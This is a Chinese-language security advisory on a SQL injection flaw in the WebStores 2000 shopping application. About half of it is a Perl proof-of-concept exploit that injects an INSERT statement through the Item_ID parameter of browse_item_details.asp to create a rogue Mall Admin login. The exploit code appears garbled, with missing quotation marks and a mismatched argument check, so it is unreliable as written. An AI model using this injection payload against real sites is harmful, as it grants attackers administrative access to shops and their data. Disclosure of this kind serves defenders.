WebStores 2000 SQL注入漏洞
2005-08-14
系统编号:
WAVDB-00271
BUGTRAQ: 7766
影响版本:
WebCortex 2000
程序介绍:
Webstores 2000是一款基于WEB的在线购物应用程序。
漏洞分析:
WebStores2000对用户提供的包含在URI参数中的数据缺少正确的过滤,远程攻击者可以利用这个漏洞进行SQL注入攻击,导致信息泄露或数据库被破坏。
问题存在于'browse_item_details.asp'脚本中,由于对输入缺少充分过滤,远程攻击者提交包含恶意SQL语句的URI,在应用程序处理时会导致修改原有的SQL逻辑,导致敏感信息泄露或数据库被破坏。
漏洞利用:
#!/usr/bin/perl -w
#This exploit create user with Mall Admin priv.
#You can login via /MallAdmin/
$pamer =
1ndonesian Security Team (1st)
==============================
http://bosen.net/releases/
ws2k-ex.pl, WebStore2000 SQL Injection Proof of Concept
Exploit by : Bosen
Discover by : Bosen
Greetz to : AresU, TioEuy, syzwz, TioEuy, sakitjiwa, muthafuka
all #hackers\@centrin.net.id/austnet.org ;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
$| = 1;
print $pamer;
if ($#ARGV<3){
print \n Usage: perl ws2k-ex.pl <uri>\n\n ;
exit;
}
my $legend = $ARGV[0]/browse_item_details.asp?Item_ID= ;
$legend .= ''; insert into Mall_Logins values ('bosen','gembel')-- ;
my $bosen = LWP::UserAgent->new();
my $gembel = HTTP::Request->new(GET => $legend);
my $dodol = $bosen->request($gembel);
if ($dodol->is_error()) { printf %s\n , $dodol->status_line;
} else { print Alhamdulillah :P\n ; }
print \n680165\n ;
_EOF_
解决方案:
厂商补丁:
WebCortex
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.webcortex.com/site2000/products.asp
信息来源:
<*来源:Bosen (mobile@bosen.net)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105448678108569&w=2
*>